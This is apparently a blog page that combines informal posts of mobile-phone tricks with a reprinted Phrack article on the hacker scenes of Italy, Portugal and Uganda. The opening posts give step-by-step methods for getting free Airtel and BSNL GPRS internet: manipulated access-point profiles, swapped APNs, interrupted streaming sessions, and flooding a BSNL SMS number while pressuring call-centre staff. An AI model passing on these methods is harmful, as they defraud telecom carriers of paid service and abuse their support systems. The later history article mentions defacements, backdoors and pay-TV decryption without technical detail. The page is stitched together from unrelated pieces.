THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS
alternate
For All Airtel Users
Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-
1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-
1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.
U can also use it through ur computer..........
someone said dis too
The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get "G" signal on ur cell as bsnl portal (wap.cellone.in) needs "gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)
NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS----
---THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
---THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
---THAT ur handset has some problems (if u say that "G" signal is not present)
----etc,etc!!
U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC'S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS--
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT'S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC'S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))
I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorect but gives u an idea of settings in ur area))
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
6)AFTER THAT, u have 2 only wait until "G" signal is there on ur screen!!
LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my "G" service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!
U may also Try this
first open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is "Airtelmms.com" instead of originally "Airtelgprs.com".
ok u've done it just active that setting and access free airtel gprs on ur phone.
Friday, October 17, 2008
International Scenes 2008
--------------------------------------------------------------------------
An overview of the italian underground (1994-2007)
You did read about the Italian scene last time on Phrack #47 [0], just
a few months after the Italian Crackdown in 1994. This short article is
an attempt to sum up the evolution of the Italian underground since
those days.
1994 was the year of the so called Italian Crackdown (aka FidoBust): a
wide (and wild) Finance Guard operation nominally aimed at busting
warez BBS. A stunning total of nearly 200 BBS systems on the FidoNet
network were seized with irresponsible methods including, but not
limited to, the requisition of all electronic equipment from the sysops
(included modems, cables, keyboards, monitors, ...) as well as the
police sealing whole rooms.
In its first phase the purpose of the operation was to fight the illegal
market of copied software and to satisfy the BSA lobby this way. However
subsequent seizures and raids proved the crackdown also had a political
objective. The bust included BBS that belonged to CyberNet (a network
supporting the motto "INFORMATION WANTS TO BE FREE", populated by
hackers and cyberpunks alike, close to social centres), ECN [1]
(european network dedicated to broadening political debate and providing
counter-information about social themes and workplace politics) and
PeaceLink [2] (peace/ecologist association and network).
Though just a few BBS were really involved in sale of warez, a lot of
completely legal BBS closed to never open again as a result of the bust.
As new people were being busted, the national press gave its best at
building castles in the air about hackers and describing them as
software pirates or members of organized crime. The underground reacted
striking to the reliability of media with a round of actions signed by
the multiple name Luther Blisset [3]. The campaign adopted hoaxes and
communication guerrilla to show the unsuitability of journalists, and
even managed to have Mondadori, the second most important publishing
company in Italy, print the whole *fake* book "Netgeneration" (1996).
As a consequence of the crackdown the Italian underground started
feeling the need of an organization similar to the american EFF, able to
support hackers against abuses. In 1995 ALCEI Electronic Frontiers
Italy [4] was founded to "affirm and protect constitutional rights for
electronic citizens as new communications technologies emerge".
Nearly at the same time, Metro Olografix [5] was born, an association
made by people with a mixed range of skills and histories, from
cyberpunks and hackers to social volunteers, that nowadays counts about
80 members. The main mission of Metro Olografix is to spread the
telematics culture through the country supporting the old BBS spirit of
sharing, free communication and cooperation. Metro Olografix has an
office in Pescara for real life meetings and acts as a crossroads for
other groups and individuals to meet. Thanks to the esteem and trust
gained from the most part of the Italian underground, the association
was able to organize events like "L'hacker e il magistrato" ("The
hacker and the magistrate", from 1995 to 1999), a face to face
conference involving hackers, magistrates and press reporters, aimed at
communicating and making understand the difference between hackers that
follow hacker ethic and real criminals.
While BBS were still experiencing hard times, 1995 registered the
boom of Internet access in Italy - mainly thanks to the VOL ISP that
offered free promotional accounts, opened POPs in many cities reachable
with a cheap urban rate call and at the beginning even provided a
toll-free number. Internet access was no more limited to universities
and the opportunity to have a relatively fast, cheap and long lasting
Internet SLIP (later on PPP) connection from home marked the growth of a
new generation of young hackers. Those guys started to study and play
with TCP/IP protocols and they elected the Linux open-source operating
system and the C programming language as their favourite study matters.
Those wannabes were going to inject into the Italian underground new
ideas within a few years and to create some valuable projects and
groups.
Like the new generation, old-school BBS hackers too got very
interested in the communication opportunities offered by the Internet.
Thanks to "Isole nella Rete" [6] (the Italian for "Islands in the Net"),
the Internet connection of ECN, BBSs of the CyberNet circuit begun to
put their contents online. Message areas turned into mailing lists and
IRC channels like #cybernet were born on EFNet.
=46rom 1987 to 1998 *the* fanzine of the Italian underground was Decoder
(published by ShaKe Edizioni Underground, a cyberpunk cooperative based
in Milan): covered subjects included hacking, hacktivism, networks,
cyberpunk culture, counter-information, leading figures and events from
the international scene, virtual reality and new technologies. As
Decoder was the only printed underground zine during those years, a few
hacking/phreaking e-zines were released: The DTE222 Technical Journal
(1987) and The Black Page (1994): altough those experiences did not
last as long as Decoder and did not focus on international scene, their
technical level was considerable.
In 1996 the first number of System Down was published, an e-zine
written by some users of IRCNet channels #cybernet and #hackers.it.
Quality and technical level of articles marked a drop compared to
previous zines, because authors were largely young guys that had started
hacking just after the Internet boom, they were not very conscious about
hacker culture and the past works of the Italian underground.
Year 1997 saw a flourishing of new groups that lived hacking mostly as
study and research about programming, networks, operating systems,
instead of catching its political value and focusing on its
consequences for the society. In the beginning members of those
organizations were for the most part low skilled, but many of them were
higly motivated, tenacious, capable of learning quickly and they
reached a very good technical level in a very few years.
Orda delle Badlands was a crew especially dedicated to owning systems on
Internet and to ircwar (deprecable activity, but widely exercised over
those times). The experience exhausted in few years because the engine
of the group was in fact the cooperation within actions engaged by its
charismatic leader (that was nearly worshipped); in the long run that
proved to be an insufficient incentive, the crew closed and some of its
members joined other groups.
Antifork [7] (formerly known as disLESSici) more than a crew is a
'hackers research virtual lab', a place where hackers can share their
techniques and codes following open source and full disclosure
philosophies. Between Antifork members there are also creators of well
known tools like ettercap. Antifork software is available through their
website and public access CVS.
The S0ftpj [8] group reunited people with different skills and
backgrounds: cyberpunks, sysops, coders, virus writers, security and
privacy researchers, hardware and network experts. Since the beginning
the group stood out out by its will to collaborate and confront
with other realities of the Italian underground (this explains the
notable amount of its releases distributed via its website). S0ftpj team
skills cover a wide range of fields - it has been contributing
to many events in the country holding workshops mainly focused on
its research in kernel hacking and new privacy enhancement technologies.
In the meanwhile, as these new groups were appearing, the fusion between
ECN/CyberNet hackers and the squat scene brought in 1998 to the first
Hackmeeting [9], a yearly 3-days hacker con "without *organisers,
teachers, public and customers* but with *sharers*", held in a T.A.Z
[10] and then totally self-organized. Altough the level of its speeches
is not always very high, Hackmeeting has become a unique opportunity to
have fun and discuss with people from different realities and feel the
informal atmosphere of old times - free of commercial influences. In
1999 the second Hackmeeting promoted the idea of "hacklabs",
laboratories mainly hosted by social centres where hackers could meet
in real to share and develop their do-it-yourself attitute and their
knowledge about programming, technologies, media activism, privacy and
cyber-rights. After Freaknet Medialab [11], the first Italian hacklab
and home of radio#cybernet, opened in Catania in 1995, other hacklabs
popped out in biggest cities of the country (Florence, Milan, Bologna,
Turin, Rome).
In spring 1998, when System Down stopped publication, S0ftpj and Orda
delle Badlands started a new e-zine called Butchered From Inside (BFi)
[12] that dealt with various topics (h/p, virus, reversing, reports from
cons, underground culture, ethics) following a semi-disclosure policy
(no complete and ready to use exploits and tools, but techniques). At
first the technical level of articles was low, but it quickly improved
and from its second year of life it already distinguished itself by its
originality and quality of its articles. BFi documented the growth of
new characters in the Italian scene, in the course of time it adopted an
acceptance policy for articles similar to the one used by Phrack and
today is also read by non-Italian people thanks to its English, French
and Spanish translations. BFi is written by hackers that belong to many
organizations, indipendent researchers and, obviously, by S0ftpj
members who have been editing and contributing during these years.
BFi has provided an example of the good spirit and built a virtuous
circle where new ideas and techniques, at first explained in the
articles, inspired other hackers to develop them further and publish
them in later articles. The feeling of a steady continuity between
works made by different contributors was great, so BFi launched
successful collaborations between hackers. In autumn 2001, BFi hosted
an important debate about a subject that had been in the background for
long time, but that had not been discussed publicly yet: feasibility of
hacking without political connotations. That topic of course was not
exhausted in that circumstance and was going to resurface periodically:
that discussion anyway helped all parties to think about it and
confront with each other: "politicals" understood that a big effort in
experimenting new techniques was becoming foundamental to fight their
battles efficiently, while "technicals" acquired a stronger
consciousness of their actions.
Sikurezza.org [13] has been another good project aimed to develop
discussions about computer security. It was established in 1999 with a
few open mailing lists, where advanced topics could be talked over by
hackers in a vendor-free, no-profit and full-disclosure atmosphere.
Unluckily, in parallel with the dramatic increase in subscribers and
posters, the technical level of posts progressively and necessarily has
decreased through the years, altough the list still represents an
important community credited also by the underground. Moreover,
researchers presenting themselves under Sikurezza.org umbrella dictated
a new style and quality standard in security speeches for events held
in Italy.
Other active hacking groups in those years were Spippolatori, Packet
Knights Crew and S.P.I.N.E.: some of them released interesting stuff
but they all eventually closed by 2005. There were also many attempts
to start new e-zines. Apart from OndaQuadra that contained also a few
nice articles, quality was low and every new e-zine started talking
about hacking from a very basic level instead of learning and catching
inputs sent from other previous editorial experiences.
New school Italian phreakers mostly have been interested in studying
PSTN/ISDN, phone kiosks and magnetic cards, cellular cloning and VoIP.
BFi published various articles on Fastweb, the biggest national fiber
optic ISP. Fastweb Milan metropolitan network has been the favourite
playground for pioneering VoIP and IPTV hacking. Since 1998 the
Spaghetti Phreakers [14] website and mailing list have been an archive
and meeting point to experiment and learn and contributed in keeping
alive interest about phreaking among new generations.
The Italian underground counts talented reverse engineers and software
crackers; some of them have been members of renowned international
cracking groups or the cracking university +HCU. Web sites like
Universita' Italiana Cracking[15] (resembling the teaching style of
+HCU) and 3564020356 [16] have been running for many years and provide
nice communities and huge archives of tutorials and technical documents.
RingZ3r0 and RACL were other two groups that published good textfiles
about reversing but they are no more active.
Italy is a country with a long and prolific artistic tradition and the
underground has got its own artists too. There have been many good demo
groups (for a comprehensive list, check the site Scene-IT [17]) and
some demo parties: "The Italian Gathering" organized by Metro
Olografix from 1996 to 1998 in Pescara, a demoscene area within
Codex Alpe Adria [18] (a wider event also featuring retrocomputing,
emulation and alternative systems) from 2004 to 2006 in Udine and since
2007 the HORDE [19] demoparty. Prof. Bad Trip [20] has been a peculiar
experimental artist capable of interpreting cyberpunk offering a visual
perspective on themes like cyborgs, mutants, polluted metropolis from
a disturbed future and so on. It is worth mentioning, in the end, the
graphic novel "Uccidere un Hacker" [21] (the Italian for "Killing an
Hacker") by Andrea Ferraresso inspired by the story of the German
hacker Karl Koch.
In the field of privacy, a milestone was erected in 1998 with the book
Kriptonite [22] written by hackers from ECN/CyberNet. Kriptonite
extensively covered theory and practice of topics like cryptography,
anonymous remailers, nym servers, steganography, voice encryption and
packet radio.
Somehow influenced by Kriptonite, Progetto Winston Smith (PWS) [23] has
been working since 1999 to sensibilize netcitizens about the risks of
technocontrol and network surveillance. PWS mantains a website
providing information about privacy enhancement technologies, for both
administrators and end users. Moreover PWS organizes every spring in
Florence a free convention called E-Privacy [24]. The con develops in
two tracks where privacy related topics are discussed at a legal and
technical level; it also hosts the local cerimony of Big Brother Awards
for the yearly best privacy violators in Italy. Besides E-Privacy there
were other events about privacy and freedom organized by Metro Olografix
like the Metro Olografix Crypto Meeting and Cyber Freedom.
Autistici/Inventati (A/I) [25] was born in 2001 as a collective of
people from hacklabs and media activist and its main effort has been to
build a server that offers free services like web/blog/mail hosting,
anonymizer, anonymous remailer and mailing list management for activits
and people desirous of privacy. The A/I server, due its policy voted to
free speech, had to be defended in tribunal many times. In summer 2005,
A/I discovered that its server had been phisically compromised, and
that the Italian police had had access to its SSL keys (which allowed
them to monitor all the traffic for a whole year). The collective
reorganized and deployed the so called "R* Plan": a fresh decentralized
redundant network infrastructure with servers located in different
countries and jurisdictions. As well as for any provided service, A/I
made technical documentation for Plan R* [26] avaible on its site.
Thanks to the work by PWS, A/I and individuals, Italy boasts various
TOR and Freenet nodes as well as anonymous remailers and nym servers.
Analyzing this short story so far you, the reader, could argue that the
underground in Italy is very healthy, but unfortunately the expression
"zombie-scene" used by Duvel in last Phrack issue [27] fits well its
real current status.
An alarming matter of fact is the big number of people once in the
underground that now collaborate with computer crime units or work for
companies providing malware and services to law enforcement agencies.
These people have been largely contributing to the death of the the
underground in Italy: even when they did not consciously fight other
hackers, the lack of trust and paranoia acted as disgregating forces
against groups and cooperations. The underground has shown not only it
is not strong enough to refuse working for law enforcements, but it is
not even able to isolate people that publicly claim to partecipate and
belong to the underground while at the same time working for the police.
Wounds are made to the underground not only by the ones who explicitly
want to strike it, but also from entities willing to exploit it. The
Hacker Profiling Project (HPP) applies criminal profiling methodology to
enable analysts to identify the kind of attacker and to anticipate his
next moves. It tries to accomplish its goal by collecting
questionnaires from hackers and deploying honeynets. Altough HPP
creators, that are italians, promote their work between hackers
stating they want to break stereotypes about the hacker figure, this
sounds a bit bizarre... their real goals are quite evident to
everybody. Zone-H [28] is another attempt to suck from the underground
giving back shit to it. The archive of defaced websites lacks the good
spirit of the old Attrition.org and the primary purpose of the
portal activities is to keep high the perception of an evil hacker
menace to sell more ethical hacking courses and services. The
organization has been able to attract a few young guys and exploit them
in borderline actions (the founder has been arrested in connection to
the Telecom Italia spying scandal [29]). It seems that in italy the
more people use the word "ethical" the less they prove to really have
an ethic.
Like everywhere, nowadays many Italian hackers are in the security
business and have stopped releasing their advances and works through
underground channels. The problem is not the fact that they speak at
commercial cons, but the limited amount (and sometimes lack of free
access) of knowledge they usually provide in such events. Those people
largely made their bones inside the underground communities and they
learnt a lot from underground publications and releases. It is then
auspicable that hackers working in security field would keep showing
their slides at cons but also give back to the underground what it
deserves, that is a detailed view of their researches to let other
hackers study, learn from and improve (or thwart, this is part of the
game, sorry) them.
In this discouraging scenario the hackmeeting community has been always
managing to wake up a few mounths before the yearly meeting and make it
a nice event, but it has experienced difficulties in bulding a
continuity of activities during the rest of the year between
consecutive meetings. Number of hacklabs in the country also decreased
in last years. In 2004 Metro Olografix organized MOCA, a hacker summer
camp run in Pescara that resembled the CCC camp and was a great
success. The experience it is likely to be repeated in summer 2008. In
recent times Net&System Security has stood out among technical cons
because of medium-high quality of its speeches; the con is held every
year in Pisa. Old groups appear dormient and only a few public releases
are published. Also BFi magazine has progressively decreased its number
of articles per year until 2006, but last year marked an inversion of
this trend that made room for a hope in a renewal of activity in a near
future. A few new groups have released good stuff but their names are
not cited here because they are not underground-only oriented - they
also offer business solutions.
Italian underground is still active, but most of old hackers keep a
low profile and rarely make their works publicly available. Most groups
and e-zine sites has been put offline by their staff depriving new
generations from accessing a part of the underground history and
culture. The underground should exploit new web technogies to regain
its past visibility and influence (do "media saturation" and "cDc"
remind you of anything?) on young talents to offer an alternative
perspective than the one proposed by the world of commercial security.
Hackers now employed in the ICT industry should understand the risks of
underground death and make an effort to spread knowledge coming from
their research through underground vectors and methods and taking back
advantages offered by a review and comparison with the community.
Limits imposed by new laws and extended technocontrol would hopefully
act as a strong incentive for the underground to get more united and
reactive.
Hackers role is to make the future more *free*, not (only) more (IT)
secure. Join the underground, keep working for and with the underground
if you care about your freedom, in Italy and everywhere.
[0] International Scenes
Phrack Magazine Volume Six, Issue Forty-Seven, File 21 of 22
http://www.phrack.org/issues.html?issue=3D47&id=3D21
[1] E.C.N. European Counter Network
http://www.xs4all.nl/~tank/ecn/
[2] PeaceLink
http://www.peacelink.it/
[3] Luther Blisset
http://www.lutherblissett.net/
[4] ALCEI Electronic Frontiers Italy
http://www.alcei.it/
[5] Metro Olografix
http://www.olografix.org/
[6] Isole nella Rete
http://www.ecn.org/
[7] Antifork
http://www.antifork.org/
[8] S0ftpj
http://www.s0ftpj.org/
[9] Hackmeeting
http://www.hackmeeting.org/
[10] Temporary Autonomous Zone
http://en.wikipedia.org/wiki/Temporary_Autonomous_Zone
[11] Freaknet Medialab
http://www.freaknet.org/
[12] Butchered From Inside
http://bfi.s0ftpj.org/
[13] Sikurezza.org
http://www.sikurezza.org/
[14] Spaghetti Phreakers
http://www.spaghettiphreakers.tk/
[15] Universita' Italiana Cracking (UIC)
http://www.quequero.org/
[16] 3564020356
http://3564020356.org/
[17] Scene-IT [!]
http://scene-it.untergrund.net/
[18] Codex Alpe Adria
http://www.0xaa.org/
[19] HORDE
http://horde.untergrund.net/
[20] Prof. Bad Trip
http://www.profbadtrip.org/
[21] Uccidere un Hacker
http://digilander.libero.it/code6502/
[22] Kriptonite
http://isole.ecn.org/kriptonite/
[23] Progetto Winston Smith
http://www.winstonsmith.info/
[24] E-Privacy
http://e-privacy.winstonsmith.info/
[25] Autistici/Inventati
http://www.autistici.org/
[26] Plan R* Orange Book
http://dev.autistici.org/orangebook/
[27] A brief History of the Underground scene
Phrack Magazine Volume 0x0c, Issue 0x40, Phile #0x04 of 0x11
http://www.phrack.org/issues.html?issue=3D64&id=3D4
[28] Zone-H
http://www.encyclopediadramatica.com/Zone-H
[29] Telecom-SISMI Scandal
http://en.wikipedia.org/wiki/SISMI-Telecom_scandal
---------------------------------------------------------------------
The Portuguese Scene
----------------------
(By Eurinomo and Quickzero)
- The evolution of the Internet
When Internet showed up, it was very expensive, even around 96/97 we
had to pay something like 1.50Euros per hour to the ISP, plus, around
1 Euro per hour to the Phone company for a Dial-up connection.
Some years later, internet got cheaper, in fact, free! ISPs started racing
on giving away free dial-up accounts without any limitation of time, they
even gave CDs with already created accounts. Still, we had to pay
the phone company.
Around 2000/2001, ADSL and cable connections started showing up, it was
kind of cheap, around 35Euros per month for a 512k connection, plus the
15Euros per month for the phone line or cable. There were no time
limitations, only traffic limitation around 3GiB. A lot of people started
showing online, for most of them Internet was a new world. Some people
started creating domestic servers, sharing information, code, and
software.
Years later, 24mbps connections were made public using ADSL2+, and it just
cost around 35Euros per month on total, with 60GiB traffic limit, so
people started to take this advantage to trade games and movies.
On the present date, OC connections are available to the public on the
capital (Lisbon), an OC connection, up to 60Mbps, costs something around
50Euros per month.
On resume, we had a slow start on internet service, but now he have a kind
of quick evolution.
- The evolution of technology
Technology always has been expensive, even now, electronic parts are very
expensive, but computers, are getting cheaper and cheaper.
I remember when I bought my first x86, it was a used Pentium-90, 16MiB of
ram, 1GiB of HD, this all inside a heavy Big-Tower, it cost something
around 700Euros, remembering that it was a used computer, and the cheapest
price I could find, the best computer around that time was a Pentium-133.
A new computer (Pentium-133) cost something around 2000Euros.
Around 2000/2001, computers started to get cheaper, more people started to
buy computers (at that time, not many people had one).
On the present date, anyone can buy a good complete computer (or laptop)
with less than 400Euros.
Only recently with this cheap technology, government and other high
entities documentation and information meet the digital world, most of it
is/was stored in hand made paper work.
- The evolution of society
Portuguese people may have an extreme reputation on sailing and
discovering
'new worlds', but it seemed that all this ended up a few centuries ago.
Nowadays, society is a lot stupid and ignorant, they started to loss the
pride of being Portuguese, the pride of the world not being enough for
everyone and still having half of it on they're hands, the courage to make
discoveries, and ending up on people that are happy if they have food on
the table, and a good reality show or soap opera on TV.
Society gives more value to someone that does something using the tools of
other person, that the person that made those tools. Per example, they
consider an expert, someone that unlocks mobile phones without knowing
what he is actually doing, without knowing what is behind it. They give
more importance to someone wearing a tie, than someone dressed normal,
they also give more importance to someone that doesn't know what he is
talking about but has a PhD or something, that someone that knows a lot
about what he is talking about, but doesn't have any diploma.
The term 'hacker', is not very popular in society, the last time it
appeared on TV was two years ago, in the format of a interview with
someone calling himself 'buzzybee', he was only a script kiddie that did
some defacing and carding, was self proclaiming himself a 'hacker' and
showed up on the news, saying that he was able to do get free stuff using
carding, and had access to any site of the internet and so on, everyone
that was in the scene knew this kid real name, phone, address and age,
even thought he hadn't many problems with the police.
- The evolution of the scene
Finally the part of most interest, the Portuguese scene is kind of
obscure, almost no one outside the scene knows what in fact is going on.
No one knows when the scene really started since it started before
the boost of telecommunications, a guess goes around 70s and 80s.
In the 90s, some groups started to show up, groups like Kaotik, Pulhas,
Ironik and a few others, even an e-zine came up, called 'PT Zine',
but died on the third release. Some of the groups still exist to this
day, but not much information comes out of it. Also, some individual
people started to show up in the form of Hackers, Crackers and
Phreakers.
The most notorious groups were:
Pulhas: Founded in 1994 by Kennobi. This was the oldest Portuguese group.
Actually is 'dead', but they had their golden age in the 90's by the
inumerous papers that they wrote and the exploit/code database to the
Portuguese mainstream.
Toxyn: Founded in 1996 by m0xx. This group is notorious known by their
campaign against Indonesia, when East Timor was occupied by Indonesia
millitary. The attack against the IT indonesian infrastracture was
motivated by the currently abuses of Indonesian military officers against
east timor people. Toxyn start their campaign with this statment: "We hope
to call attention to the necessity of self-determination and independence
of the people of Timor, oppressed and violated for decades by the
government of indonesia. We hope you give your full attention to this
historical step towards freedom, we ask that you help us fight the tyranny
of Indonesia occupating Timor." The campaign was started at 10/2/1997.
The fall of the Toxyn, has began when m0xx, has accepted and gave
inumerous interviews about the campaign and about the portuguese hacker
scene, exposing plans and actions of the scene. Toxyn group was helped
by Savage, an known spanish hacker, who developed the exploit, that
Toxyn Group used to break in in the .ID servers.
KaotiK: Founded in 1997(??). They've been a very active group in the
East Timor campaign, hacked and defaced inumerous .id websites. They've
created the first ezine about hacking & security to Portuguese people.
The e-zine was extinct after 3 editions. KaotiK has reach their fame in
the Portuguese Scene after a member disclosure of some flaws in various
Microsoft products.
F0rpaxe: F0rpaxe was maybe, the most mediatic group/'hacker'/troll, for
the worst reason. This character was the responsable for the first major
attack against US .mil targets in 1999. The attacks were allegedly being
carried out in retaliation for Federal Bureau of Investigation (FBI) raids
on suspected "crackers" in several U.S. cities. The attacks hits various
governemental and military webservers including FBI, NSA and the Navy.
East Timor Campaign: Was one of the firsts major hackivism campaign
worldwide. Timor was in Portuguese administration until 1975, after
Portuguese government abandoned that country, Timor was invaded by
Indonesia military army, who oppressed, violated, raped and murdured for
most 20 years. Various Portuguese hackers and groups decided to begin a
campaign to show to the world the truth about the Indonesian occupation
in East Timor. The East Timor campaign started in 1997 and was finished
in 1999. Various military, governement and corporativ indonisian websites
had been defaced. The defaces was to aware all people in the world about
the illegal occupation of East Timor, the mission was accompliced, the
attacks were transmited to the media all over the world. The campaign
was finished when m0xx, the lider of the group Toxyn, gave inumerous
interviews to the midia, exposing then the entire portuguese scene to the
public.
[5~Between 2002 and 2004, two Portuguese hackers also did some 'infamous'
work, these two hackers gained access to FCCN ('Fundacao para a
Computacao Cientifica Nacional' / Foundation for National Scientific
Computation), witch was backdoored with a reverse ICMP backdoor developed
by them, witch rumours say it is still active. They also gained access
to numerous universities and were backdoored the same way, this includes
the 100 machines cluster 'Centopeia' from 'Faculdade de Coimbra'. A lot
more work was made, including the database server of 'A.M. Gonçalves' and
'Salvador Caetano', Portuguese Toyota distributor. Then they just
disapeared from the scene.
Some of the people inside the scene are found on the x86 '0xD9D0', those
whom know, know what I'm talking about.
On the start of the new millennium, an explosion of 'lame' groups started,
most of them were kids playing up with Trojans, others, were script kids
playing up with public exploits, most of this groups are found on a
Portuguese IRC network, called PTNet. Some of these kids turned up to be
carders, using databases found by 'Google hacking', or simply by asking
people on some IRC networks. Some of these kids ended up having problems
with the police, but nothing serious.
Also in the start of the new millennium, satellite and cable Phreakers
starter to show up, breaking encrypted signals, an unnamed box came out,
that was plugged in the TV SCART connection and an external 9v power
supply, and unlocked (in fact, it broke the Nagravision encryption) every
single channel there was on cable TV, this box for a long time was though
to be made outside of Portugal, until I had the pleasure to meet the
original creator of it, and guess what, he was Portuguese, and lived next
to me, he explained me how it really worked, and how was the original
version, since the version that everyone had, that was commercialized
by lame groups searching for profit, had way too much components that it
didn't need at all, it even got some traps, only to make itself more
expensive, and difficult to make, in order to avoid people
commercializing it. Also, satellite FTA boxes started to get themselves
modified nationally, in order to break satellite TV encryptions,
like Nagravision (used by or cable TV provider, 'TVCabo'). So did the
original TVCabo cable boxes, some national hackers were able to hack
the firmware, in order to get its unique ID (Boxkey), and created cards
that once plugged, were able to break the signal. After this, this
knowledge started to get public, but on a 'pratical' way, and lots of
people started to make profit out of it, without knowing what they were
really doing. In other words, they knew if they bought this and that, and
used this and that software, were able to have free satellite/cable TV,
and they could seal later to other people. An example was the first
unnamed box that was created, it cost 4Euros to build, but people were
sealing it up to 100Euros. So do the FTA boxes, cost something around
70Euros unmodified, and were sold for 250Euros modified at no cost.
Nowadays, the scene is still obscure, and people are still ignorant,
sometimes, there is an exception, like when I went to an interview to
a part of the Bosch Group, where the guy interviewing me, by reading my
curriculum started to laugh silently, and said to himself 'A hacker..' and
'hackers do not harm anyone... only if pushed too', without me making any
mention to illegal activities (duh) or being member of this or that group.
When I was guessing myself unemployed, I got myself well employed, and
working on more areas than I was asked to, I even got myself involved
with robotics, automation, and electronics, when I was attending the
interview as web developer for an Intranet. Later, we found out that I
already knew him from the scene, and so did he knew me.
-----------------------------------------------------------------------
Ugandan Scene(surprise!!!!!)
============================
by gmac
Introduction
------------
For those who don't know what Uganda is n are too lazy to use google, well
in short its located on the African continent more specifically in Eastern
africa. Still lost then this will clear it all up for you, have you ever
heard of a movie called Last King of Scotland if yes then you know Uganda
and if No then use google.
Sometime back.....
------------------
Cutting edge computer technology is as you correct in assuming fairly new
in the Ugandan context, it cannot be more than 13 years old so generally
hacking on our scene had maintained a fairly urban legend status, not much
is avaliable on any hacking groups back in the day to be honest to my
knowledge they were almost none existent.
Present....
-----------
Currently as technology advances the scene has surfaced with formation of
groups like gsquad by yours truly which is i believe the first of its kind
here, although hacking has still maintained its urban legend status the
scene is dominated by a few knowledgeable individuals. Bu..t the winds of
change are upon us because i have seen the advent of a new generation with
a desire which ofcourse has been fueled by hacker related movies like most
recently Die Hard 4.0. The gsquad remains the only active group providing
help to individuals on request and ofcourse releasing zines(which was but
made a print debut recently) which has won many fans but ofcourse inspired
by Phrack. This new generation needs content and i think Phrack is our one
stop Hacking Content Provider (HCP,oh i made that up).
We are late comers onto the scene but we will catch up because we have the
spirit, and oh it was BloodAxe's first appeal that drove me to starting
the gsquad so i hope the circle of lost hackers' appeal will inspire
another individual somewhere on this planet.
We maybe in different lands but we are part of the same underground, so we
will survive the media caused division which started all these different
kind of hats i hear white hats....erm...black...grey we may soon hear pink
hats(ie blondes running security sites)
The spirit still lives on but its in a critical state......
Subscribe to:
Posts (Atom)